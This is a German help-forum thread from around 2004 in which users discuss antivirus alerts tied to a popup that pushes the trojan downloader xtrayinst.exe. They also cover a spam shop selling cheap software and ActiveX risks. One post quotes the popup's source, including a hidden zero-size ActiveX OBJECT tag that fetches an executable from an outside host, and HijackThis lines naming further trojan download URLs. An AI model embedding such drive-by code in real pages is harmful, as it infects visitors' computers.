Wieso schlägt bei mir McAfee immer Alarm, meldet einen Virus, <<Exploit-URLSpoof.gen>> wenn ich in Ihrem Forum nach folgendem Suchbegriff suche?


Habe das jetzt mehrmals getestet, immer das gleiche!!!

Suchbegriff: xtrayinst.exe

Forum: Online und PC Sicherheit



MfG

xtrayinst.exe

Hallo@

Wenn du Englisch verstehst, dann lies das mal durch.
http://www.dslreports.com/forum/remark, ... ~mode=flat

mfg
Nikita

Na ja, wenn ich schon mal bei Euch bin, denn eigentlich poste ich gerade in einem anderen Forum - suchte bei Euch "nur" nach Informationen zu einem anderen Thema.

Vielleicht blickt ja jemand von Euch durch?
Da ich die Beiträge schon geschrieben habe, kopiere ich die wichtigsten einfach mal:


Ständige VIRUSWARNUNG von Norton beim
Besuch der folgenden URL:

www.nitro-einkaufen.com

(bitte die URL nicht in den Browser eintragen, und wenn -

dann auf e i g e n e GEFAHR!!!)

Teste später mal mit `nem anderen Rechner, wenn ich mehr Zeit

habe.

Info über die Viruswarnung: [URL=http://www.symantec.com/region/de/techsupp/avcenter/venc/data/de-download.trojan.html]

http://www.symantec.com/region/de/techs ... rojan.html[/URL]

Auszug:
Download.Trojan
Entdeckt am: 08.06.2001
Zuletzt aktualisiert am: 08.11.2004

Download.Trojan stellt eine Internetverbindung her und lädt andere
Trojaner oder Komponenten herunter.

Varianten: Trojan Horse
Typ: Trojanisches Pferd
Infektionslänge: Variiert

Betroffene Systeme: Windows 95, Windows 98, Windows NT, Windows 2000, Windows XP, Windows Me
Nicht betroffene Systeme: Macintosh, UNIX, Linux

Neuer Link: http://securityresponse.symantec.com/av ... rojan.html



Selbe URL, anderer Rechner:



www.nitro-einkaufen.com/

MCAfee/Virus: Generic VB.c



Info über die Viruswarnung: [URL=http://vil.mcafeesecurity.com/vil/content/v_125073.htm]http://
vil.mcafeesecurity.com/vil/content/v_125073.htm[/URL]

Auszug:

Trojan Name Risk Assessment
Generic VB.c Corporate User : Low
Home User : Low

Trojan Information
Discovery Date: 11/10/2004
Origin: Unknown
Length: N/A
Type: Trojan
SubType: Win32
Minimum DAT: 4358 (05/05/2004)
Updated DAT: 4406 (11/10/2004)
Minimum Engine: 4.3.20
Description Added: 05/05/2004
Description Modified: 05/05/2004 1:24 PM (PT)


Quellcode vom Popupfenster:
(Gekürzt)


</object><OBJECT CLASSID="CLSID:00000000-0000-0000-0000-000020030000" codebase="http://xxxtrayicon.com/xtrayinst.exe" width="0" height="0"></object>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.orgz/TR/html4/loose.dtd">
<html>
<head>
<title>::. XXXTRAY .::</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
body {
margin-left: 0px;
margin-top: 0px;
margin-right: 0px;
margin-bottom: 0px;
background-color: #CC66FF;
}
-->
</style></head>

<body>
<p>&nbsp;</p>
<table width="581" border="0" align="center" cellpadding="0" cellspacing="0" background="pop1_bckgr.jpg">
<tr>
<td>
<table border="0" width="581" align="center" cellpadding="0" cellspacing="0">
<tr>
usw.


Info:

[URL=http://www.google.de/search?hl=de&q=xtrayinst.exe&btnG=
Google-Suche&meta=]http://www.google.de/search?hl=de&q=xtrayi...gle-Suche&meta=[/URL]

So kam ich zu Euch! *g* &

Hallo nikita!


Original erstellt von nikita:

Mit den Virenwarnungen kann ich genauso wenig anfangen, wie du...naemlich nichts.

Poste bitte deine Logs vom HijackThis, dann sehen wir weiter.
mal sehen, ob das hier dann erscheint:
O16 - DPF: {00000000-0000-0000-0000-000020030000} - *http://xxxtrayicon.com/xtrayinst.exe*

Ich kenne HijackThis. Hervorragend, gerade bei Browser-Hijackern… und einiges mehr.

Hätte ich keinen aktuellen Virenscanner, würde höchstwahrscheinlich wohl <016 – DPF: usw.> in der Registry stehen. Was aber beim Anblick meiner Screenshots unwahrscheinlich erscheint?

MfG

xtrayinst.exe


P.S.: Ergebnis von Google: http://www.informationsarchiv.net/foren ... -5762.html / Beitrag wurde an einer anderen Stelle fortgeführt!? Deshalb habe ich in Eure Suchmaske xtrayinst.exe eingegeben. (Habe die Fortführung nicht gefunden) Deshalb auch der Nick, nikita.

Bundesamt für Sicherheit in der Informationstechnik
<Hinweise, Fragen und Kommentare zu ausgewählten Themen>


Computer-Viren-
Meldung von Computer-Viren>>> http://www.bsi.de/bsi/kontakt.htm

Und weil wir schon mal beim Thema sind, nikita, nämlich – Online und PC-Sicherheit, fahre ich gleich mal fort, damit es Euch nicht so langweilig wird:

Eine spam mail unterbreitete, sagen wir es mal so, ein etwas merkwürdiges Angebot:

Die Page / der Shop machte einen sehr professionellen Eindruck, hatte allerdings keine Keywords, lediglich einen Titel.



Zum Beispiel:
Adobe Photoshop CS / kostet über Adobe 1,228.44 €

Nach deren Angaben / Photoshop 8.0/CS:
retail price: $500
our price: $100
you save: $400

Zahlungsart: MasterCard und Visa (sonst keine andere Möglichkeit die Produkte zu bestellen)

Eine Whois-Abfrage der org-Domain ergab, dass diese erst vor knapp 2 Monaten angemeldet wurde, eine Frau, ansässig in Moskau / Russland.

Eine Recherche im Internet über die betreffende Domain brachte fast nichts, außer:

http://www.joewein.de/sw/blacklist.htm


Dort sind beide Domains in einer „blacklist“ vermerkt.

Deren angebotene Produktpalette:


• OPERATING SYSTEMS
• MS Windows XP Professional
• MS Windows 2000 Professional
• Red Hat Linux 7.3


• PROGRAMMING
• Delphi 7
• Visual Studio .Net


• ANTI-VIRUS & SECURITY
• Norton Antivirus 2004 Professional
• Norton Internet Security Pro 2004
• McAFEE Personal Firewall Plus 2004
• McAFEE Spam Killer 2004


• GRAPHICS AND PUBLISHING
• Adobe Creative Suite Standart FULL
• Adobe Acrobat 6.0 Professional
• Adobe InCopy CS
• Adobe InDesign CS
• Adobe Photoshop 8.0/CS
• Adobe Photoshop 7.0
• Adobe Photoshop Elements 2.0
• Adobe Illustrator 11.0/CS
• Adobe Illustrator 10
• Adobe Premiere Pro 7.0
• Adobe Pagemaker 7.0
• Corel Draw Graphics Suite 11
• Macromedia Flash MX 2004
• Macromedia Dreamweaver MX 2004
• Macromedia Fireworks MX 2004
• Macromedia Studio MX 2004


• PC DIAGNOSTICS
• Norton SystemWorks 2004


• OFFICE SOFTWARE
• MS Office XP Pro
• MS Office 2003 Professional Edition
• Easy CD & DVD Creator 6
• Ahead Nero 6.3 POWERPACK
• WinFax Pro 10.03
• PC Anywhere
• SYMANTEC NORTON GHOST 2003


• SERVER SOFTWARE
• MS SQL Server 2000 Enterprise
• MS Windows Server 2003 Enterprise
• MS Windows 2000 Server
• Red Hat Linux 7.3


• FINANCIAL SOFTWARE
• Quicken 2004 Premier
• Microsoft Money 2004 Standard
• QuickBooks 2004 Premier Edition




P.S.: Sollte einem so eine Mail, mit einem entsprechenden Link - die zu so einem Angebot – oder zu einem ähnlichem führt, angeboten worden sein… Vorsicht!!!


In der Regel handelt es sich dabei um:

This e-mail may very well be offering counterfeit and/or pirated software or may be a credit card scam. <Internet Security Investigator - Symantec Corporation>

http://www.bsa.org/germany/index.cfm

Und vielleicht noch ein Hinweis, bevor ich wieder in den Weiten des Internets verschwinde…an alle Wireless Fans.
Hatte gestern noch mit Spezialisten von der Kripo ein Gespräch darüber:

Es ist in den meisten Fällen eine Kleinigkeit einen Wireless router abzuhorchen, aus dem Auto, mit einem Laptop… hat man nur das richtige Programm.

Also, was meine Meinung betrifft: Lieber paar Kabel verlegen - und ein "anständiges LAN" aufbauen.

Und wenn Ihr schon so einen "Mist" haben solltet, genau überlegen was Ihr damit alles macht.


MfG

*zunikitaschiel* & *wink* & *g* ...wie war noch mal mein Nick?

Hallo@

Ich koennte dir genuegend Seiten posten , wo Software und , was noch schlimmer ist....Antivirensoftware angeboten wird (ich in meiner Versuchswut bin mal auf einer polnischen Seite reingefallen...und bekomme heute noch Mails von denen...vielleicht weil sie traurig sind, dass ihr Trojaner nicht mehr existiert...den sie mir unterschieben wollten...)

um aber wieder auf dein Problem zurueckzukommen:
O16 - DPF: {00000000-0000-0000-0000-000020030000} - *http://xxxtrayicon.com/xtrayinst.exe*
ist der Trojaner : Win32/VB.JL.
O16 - DPF: {00000000-0000-0000-0000-000020030000} - *http://www.advnt01.com/dialer/ger_nopop.exe*
*O16 - DPF: {00000000-0000-0000-0000-000020030000} - *http://207.234.185.217/ABoxInst.exe*
TrojanDownloader.Win32.VB.ff
Auch wenn der Download nicht ausgefuehrt wird, installiert sich der Trojaner in den temporaeren Dateien.
z.B.
c:\docume~1\username\locals~1\temp\ilx6600x.exe
c:\docume~1\username\locals~1\temp\xinmzdyo.exe
c:\docume~1\username\locals~1\temp\mq7hn8fx.exe
c:\docume~1\username\locals~1\temp\c5ag47nf.exe

"C:\Dokumente und Einstellungen\username\Lokale Einstellungen\Temporary Internet
Files\Content.IE5\IE5\CDMN4PMF\send_exe1(1).htm"

Wenn geladen wurde, sollte man xtrayinst.exe und die anderen exe + Tmporaere Dateien loeschen.
Ich weiss leider nicht, ob auch eine dll zum Trojaner gehoert, die sich dann im Browser verankert (?)

die temporaeren Dateien kann man loeschen, indem man eine Datentraegerbereinigung durchfuehrt.
Datentraegerbereinigung: und Löschen der Temporary-Dateien
<Start<Ausfuehren<cleanmgr
#Click:Temporäre Internet Files/Temporäre Internet Dateien, o.k.
#Click:Temporäre Dateien, o.k

#Windows\Downloaded Programm Files -->löschen:
sind die : 016-Eintraege im HijackThis

ctiveX ist eine Technologie, die von Microsoft als Konkurrenz zu Java entwickelt und inzwischen in fast alle seine Programme integriert worden ist. ActiveX soll dafür sorgen, dass bestimmte Windows-Eigenschaften von Webseiten genutzt werden können. Dies geschieht über so genannte Controls, die auf den Computer geladen werden und dort ausgeführt werden. Dabei werden sie als Bestandteil von Windows gehandhabt und unterliegen keinen weiteren Beschränkungen. Darin liegt aber die große Gefahr, die von ActiveX ausgeht, denn es ist auf diese Weise ein Leichtes, private oder sicherheitsrelevante Daten auszulesen, zu löschen, zu manipulieren, den Rechner umzukonfigurieren oder einen Virus oder ein Trojanisches Pferd zu installieren.

-->Tipp: Wenn Sie wirklich auf Nummer Sicher gehen wollen, sollten Sie ActiveX im Microsoft Internet Explorer deaktivieren oder einen anderen Browser verwenden.
Alternative Browser wie Mozilla oder Firefox bieten den gleichen Surfkomfort - ohne ActiveX

mfg
Nikita
.............................................................................................................

Hallo,
nimm den Firefox. Habe deine Links verfolgt und konnte nichts aufregendes mit dem Firefox erleben. Es ist einfach der bessere Browser

Hallo Nikita, Danke Dir erstmal.

Du gibst Dir hier sehr viel Mühe, machst Dir jede menge Arbeit.
Bin jetzt allerdings sehr müüüüüüüde, deshalb nur paar wenige Sätze.

ActiveX, oder die ActiveX controls - habe ich immer auf EINGABEAUFFORDERUNG stehen, ich weiß…
(Was den "McAfee-Rechner" betrifft, so musste ich die ActiveX controls sogar mit JA bestätigen, sonst hätte ich den Trojaner nicht fangen können. *g* )

Manchmal sind es aber auch VB-Scripte, oder andere Scripte, die…

Firefox? Ja, ich weiß… Trotzdem schon hart...
Die Viruswarnung hängt mit dem Popupfenster zusammen, da Firefox aber von vornherein das Popup blockt…
Deshalb hast Du nichts gemerkt.



Grüße und ein schönes We,

Xtray

P.S.: nikita, wie war noch mal mein Nick?
Sorry, habe alle screenshots mal gelöscht. Meine, nicht gelöscht - "nur" aus dem Thema genommen. Natürlich haben wir alle Screenshots und die Logs von Norton & McAfee, etc. gesichert - auf CD

Noch mal kurz eine Anmerkung, warum ich nicht so gerne mit Firefox "unterwegs" bin:

Ok, sicher ist Firefox/ Mozilla oder der von Netscape sicherer wie der IE.
(Habe die auch auf der Platte, zum testen, oder auch mal zum surfen, etc.)

Allerdings haben einige "Jecke" Ihre Page mit Frontpage (von microsoft) erstellt.
Bei solchen Pages – sieht man dann oft nur die Hälfte, oder sie laufen, was die Darstellung betrifft, nicht so toll, oft sogar verheerend, wenn man diese Pages nicht mit dem IE besucht. In dem Punkt ist nämlich der IE unschlagbar. Der verzeiht sogar so manchen Fehler im Quellcode.
Aber das ist eben nur ein Aspekt von vielen.

MfG

xtray

P.S.:
Was die gepostete URL betrifft, so scheint es mir zumindest im Augenblick, dass der Quellcode verändert wurde, sodass McAfee & Norton nichts mehr meldet. Habe allerdings ActiveX mit NEIN bestätigt, bin mir deshalb nicht ganz sicher.

Was den "Norton-Rechner" betrifft, musste ich allerdings zu dem damaligen Zeitpunkt im Bezug auf die von mir geposteten Ereignisse - nichts mit JA oder NEIN bestätigen.

MfG,

xtray